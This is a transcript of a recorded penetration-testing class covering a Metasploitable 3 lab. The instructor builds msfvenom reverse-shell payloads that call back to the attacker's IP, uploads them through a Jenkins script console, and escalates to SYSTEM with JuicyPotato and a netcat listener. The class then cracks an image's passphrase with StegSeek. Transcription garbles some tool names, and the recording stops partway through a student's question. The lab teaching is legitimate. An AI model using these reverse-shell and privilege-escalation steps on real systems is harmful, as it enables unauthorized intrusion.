All right, guys. So, as usual, the first step that we normally do is that we try to find out the IP address of the victim. Um, in most cases, you can use Net Discover, you can use Nmap. Okay, so because I'm on my home network, so you can see a lot of hosts here, and the first thing that I'm going to do is we'll just try to see what ports are open on 1.60, whether or not if this is my target. So looks like that. Okay. So I'm just running a version scan for the applications that are running. Still not running. Okay. Same time I can open this part, the first part of the lab that I'm talking about, you have already done it. Okay. So this is, I'm not going to explain or repeat this thing. You have already done it. You have done this exploitation before uh, on this Metasploitable 3. So I don't know if this is the machine or no. Let me check. SSH, RPC, MySQL, Undermap runtime services. And here also it says server, so it's fine. This is my target machine, okay? And you won't get this machine, by the way. Don't think you will be getting this machine for the exam. This is just to demonstrate how to do the privilege escalation. So the first part, which is the exploitation, we have done it before. Uh, 160, okay. Anyways, I'm going to stop this scan because, we have done it before. It's taking too long. Okay, let it go. Okay, so the next thing I'm going to do is I'm going to create a payload. Okay, MSF Venom. Windows, Metapredator. The local host is, I think, 157. 157. I'm creating an executable file, exe. Local port, you can put any. I'm using Tetra4, and I'm going to just call it priv.exe because we are doing a privilege escalation lab. So I'm just going to call it priv.exe. Okay, this is step number 1. And this is, like I said, it's from the previous lab. So let's wait for it. Guys, those who have to do the repeat exam, they can go and join that link that I sent you on Discord. or on Zoom. Okay, please, those who have repeat exam, please join Discord or Zoom. Okay, so these are basically the services which are running, and I'm targeting 8 port 8484. Where is it? 8484, and when you navigate here, we find out that there is script console. Now, in the meantime, I can run the Python server, the HTTP server, because I want to upload this file on the target machine. So we have this script that we are going to use to upload the file. Okay, so I'm uploading this file. I just need to change a couple of things, I think. So it's running on 8000. What was the file name? Priv.exe, right? Yes. And I'm going to place it in this directory with priv.exe. No, it's not all right. So by running this script, I should get an OK message here if the file is uploaded. Let's see. Right, so a 200 OK message means that the file has been uploaded there. Now, before I run the next script to exploit it, I need to start the listener. And for that, I need to run the MSF console. So I will tell you when we start the process of privilege escalation. Okay, right now I'm just trying to exploit it and get a metadata session. Okay, so use exploit Windows. Okay, Windows multi handler. Okay, so we are using this particular exploit. We will use the same payload that we have used in order to create that executable file, that is priv.exe. So Windows Metaprether reverse underscore TCP. Show options, set lhost 192.168.1.157. L port is already set, so there's nothing left, I think. All right, so just exploit it. So the listener is now listening on port Tetra 4. And then we need to just execute the next script in order to execute the file. So I'm going to remove it, and file that we uploaded was priv.exe. Run the script. And let's wait if we get the session. All right, so now you can see we have the session. So this is the point where you have successfully exploited a system. The first thing you want to check is that what kind of privileges do you have? So if you write get user ID, it basically gives you that you have a local access, local service entity authority. You don't have the system privileges. So the highest privileges that one can get is the system privileges, which is written something like this system. Okay. Entity authority backslash system. Now, previously, when there was no UAC control, it was quite easy to get the system access by running just get system. Okay, it used to happen like that. However, it doesn't work anymore when they introduce the UAC, user access control, into the Windows, right? So uh, we don't have the system access, and this is what we are trying to do to get the system access. Just give me a minute, guys. I want to make sure that those students who are supposed to take the retake are actually not in this room. Okay, so give me a minute. I will stop sharing for a minute. Just give me a minute, guys. Um, okay. Please check your message one more time. One of the students who is supposed to take the repeat exam is sitting in this room. Please check your personal message and join that room. All right. God, I don't know. I mean, it's your exam. You should know what some of the students, they don't care at all, I think. Okay, guys, I have done my job. Those who missed the exam due to their negligence, it's their responsibility. Okay, guys. So, like I said, I mean, previously without UAC, you were supposed you could have got the by using get system. I mean, if you use Windows XP, exploited, you will probably get it without any hurdle. However, and now um, we need to use an alternative method, and that is, first of all, you need to check something which is called get privs. And when you write get privs, you just make sure that this SE impersonate privileges is actually enabled on the target machine. Okay, so if this is enabled, you can actually impersonate the token, and then you can get the higher privileges, that is the admin access. Oh, sorry, the system access. Now, how are we going to do that? First of all, you need to download a tool called Juicy Potato. I think it's Juicy Potato, right? GUICY. I think I downloaded it, but I'm just going to. It's an exe file. Okay, abusing the privileges by using Juicy Potato. So you just need to go to this link and download juicypotato.exe. Is the right link? Yeah, so you can get it from this link, okay? I think I have it on my machine. Just let me check. Maybe it's on the desktop. Yeah, so I actually downloaded it before. So once you have this on your desktop, juicypotato.exe, you need to create another batch file by using MSF Venom. So here is the thing. You have already one session, which is a low privilege session. By using Juicy Potato and creating another malicious file, which will be a batch file with .bat extension, we are going to exploit it one more time, and then probably we will get uh, the higher privileges. Okay, so first thing we need is juicypotato.exe, and then the second thing we need to do is that we need to create MSF Venom -p payload cmd slash reverse, or is it Windows? Just a minute. CMD Windows / reverse _ PowerShell. Okay, so I'm using another payload this time, which is CMD Windows reverse _ PowerShell. Lhost is the same, which is 192.168.1.157. L port is going to be, you need to change the port. So let's just say I'm going to give it 90,000. Okay. How many ports we have more? 65,000, I think. Anyways, let's call it 9,000. Okay. So L port is 9,000, and then I'm going to write it or save it as, let's call it, I'm going to call it priv.bat. Okay. Quite simple. MSF Venom, the payload, the local host, a new local port, and create a file known as priv.bat batch file for the Windows. All right. Okay, so I will also share this notepad file to for you to remember the steps. Okay. Now you have to make sure that you have the other Meterpreter session because we need that. Okay, so we still have this. Let's see. By the way, one more thing you can do in the Meterpreter is you can write ls to see where you are, in which directory you are currently. Okay, so right now you are in C, program files, Jenkins, scripts. I can put the juicy potato in the same directory or maybe in some other directory. You can see priv.exe that I uploaded is actually here, right? So for example, if I move out of this directory, now I'm in Jenkins, I can again move out, move out. So now I think I should be in C directory, right? In fact, I can move to some other directory also where I want to place these files, which are less suspicious, for example. But it's up to you where you want to place them. Okay, let me see if the priv.bat file is created, right? So now you can see I have two files. One is juicypotato.exe that we downloaded from the internet, and then we have priv.bat file. Now what I need to do is that I need to upload both of them into the target machine. But before I do that, I need to start a listener netcat minus NLVP, and I need to run it on port 9000. Okay. Because I have created a new malicious file, which is going to try to make reverse connection on port 9000. So there should be a listener listening. So it should be netcat nc hyphen NLVP 9000. So now the netcat is actually listening. All I need to do is I need to move these two files first of all, juicypotato.exe and priv.bat. Okay. Just thinking to move to some other directory here where there are less files in order to avoid. So users ls. How about move to public? Okay, so move to all right. So I'm just going to copy my files here in the public folder, public directory. Okay. So the way you need to upload is by using the command. You need to be in the Meterpreter session to upload these files. Okay. So upload which file? Root, desktop. The first file that I want to move is juicypotato.exe. And where do I want to move it? You can even write C drive and that's it. Or if you have already moved to this directory by using CD, if I don't write anything, it is going to copy these files into the public directory. Okay. Or if you want to give the full path of some other directory, you have to use double backslash always. Okay. So for example, if I want to move to, let's say, documents, and I want to copy it in the documents folder, I have to write C colon double backslash. You have to give the whole path. Users backslash public backslash documents. Yeah, sorry, double backslash. Okay. So you can see here that I have moved the file into this particular directory. Uh, the next file that I want to upload is the batch file, which is on the desktop, triv.bat, and I'm moving it again to the documents folder. Okay, so both the files now are basically uploaded there. And you can see here right now the listener is listening because I did not execute those files. So what I'm going to do is now write shell, and you write shell, you basically go inside the Windows machine into the command shell and move to the directory where you have these two files. Now here ls will not work, I think, because it's okay, it's working good. Otherwise you can use the dir command, which is a Windows command. Okay, now these are my two files, uh, juicypotato.exe and triv.bat, right? So what I need to do is juicy potato.exe -t static -p, the payload is priv.bat -l, the listening port is 9000. Okay, 9000. So once I run this command, it should be able to impersonate the token and give me a system access to the um, target machine, right? So let's try. Okay. So it says that created the process with the token. Um, and now you can see the netcat, it has uh, given me a new shell. It is not a metalpreter shell, but it's a shell to the Windows. Now, if I write who am I, you can see here now that you got the system access. Okay, the previous access that you had, which was in the other metalpreter session, let me just go back. I hope I didn't lose that session. Maybe I lost it, I don't know. Oh no, I have both of them, sorry. This is the second one, and this is the first one, right? So if you see this session, it has a local privileges. If you see the second session, which was connected to the netcat, it has a system access, okay? So this is how you basically do the privilege escalation. Um, so make sure you go through this lab. It's very important. Um, another thing that I want to do is to introduce you to another tool. Okay, I'm going to close it down. Okay. One more thing. So if you want to download something, you should also know how to download a file, okay? So uploading is one thing and downloading, you should also know. So for example, if I'm here and if I go to pictures, and I want to download, let's just say this file, for example, 10 of diamonds. Let me just favorites. Nothing. Okay, any file is okay. So for example, I just want to download this desktop.ini file. So you just simply need to write download and desktop. Do I need to give the full path? Let's try. Sorry. Yeah, so because I'm already in this directory, I can actually download the file, and you can see it is saved in the root folder. All right, if you want to verify, cd, sorry, not cd, I'm already in the root. So you can see desktop.ini file there, right? Okay, guys, so this was about the privilege escalation. Now, there's another tool that I want to introduce you guys to, which is called StegSeek. All right, so the StegSeek tool. So if you go to this website, there are many different ways to install the tool. So what I did is that I went to the latest release of StegSeek. You can use Dockers. You can use any other method. The method that I used is that I downloaded this Debian file, stegseek.db. I've actually already installed it, so I'll just tell you how to install it. In fact, it is mentioned on the website on the GitHub. So download this .debian file, and then you can run this command, sudo apt install /stegseek.deb. If you get any error, you can add fix broken. So for me, I've already installed it. So this is the Debian file. So in order to install it, apt-get install /stegseek. Sit with. So for me, I already have, but like I said, I got an error. But then I added an argument fix broken. So it basically installed it successfully, right? Now, what is StegSeek? It's basically if you find some images which have some uh, hidden data inside it. Uh, it could be anything, the hidden data, message, a hash, or anything. So if you want to extract that, you can use StegSeek. And the amazing thing about StegSeek is that it basically goes through the list of passwords, uh, even if the file is protected with the password, and it actually extracts the data within seconds. It is very, very fast. I think the previous version of StegSeek was StegHide. So you can go on the YouTube or even on the internet to read a little bit about StegSeek, but I will just tell you the usage, how it works. So like I said, if the file is protected with the passphrase or a password and it has some hidden information in it, you can use StegSeek to really, get the results within seconds. So how to use it? I'm going to use it on a message, on an image file, which you can see here, gateway.jpg. Although I think I just randomly got it from Derek, so I don't know if it has some data in it or if it has a passphrase in it, but I'm just going to tell you the usage so that it may come handy to you. So StegSeek, it's very simple. You just write StegSeek gateway. And then by default, it actually uses the dictionary in the Kali Linux known as rocku.txt. Now, one more thing about rocku.txt is that when I tried to run it the first time, it's rocku.txt. So basically, this file is in the .gz format, okay? Which basically you need to first extract it, because otherwise the tool gives the error that there's no such file as rockq.txt. So what I suggest to you is that use gunzip and then this file in order to extract the file, rockq.txt from within this .gz file. So run this one first, and then you go back and you don't need to give the path. Okay, you can give the path if you are not using another dictionary. I mean, if you are using another dictionary, if you have your own dictionary, you can give the whole path in front of this, like this. However, since it by default use rockq.txt, which should be good enough because it has a lot of passphrases. So you just need to write stagseek and then just the image file and press enter, and it will start working. Now, like I said, this is just a random image. Maybe it's not even having any kind of hidden message. It's just an image, but um, couldn't find the valid passphrase. But like I said, if it's an image hidden and it has a passphrase, um, which is from the dictionary, you should be able to get the results. Okay. So what I want from you guys today is to go through this two tools. Sorry, the first one, the privilege escalation lab, and the second one, this Stagseek tool. Okay. Right. So I'm going to stop the recording and stop the share.
Excuse me, Asa, I have a question.
Yes.
Now,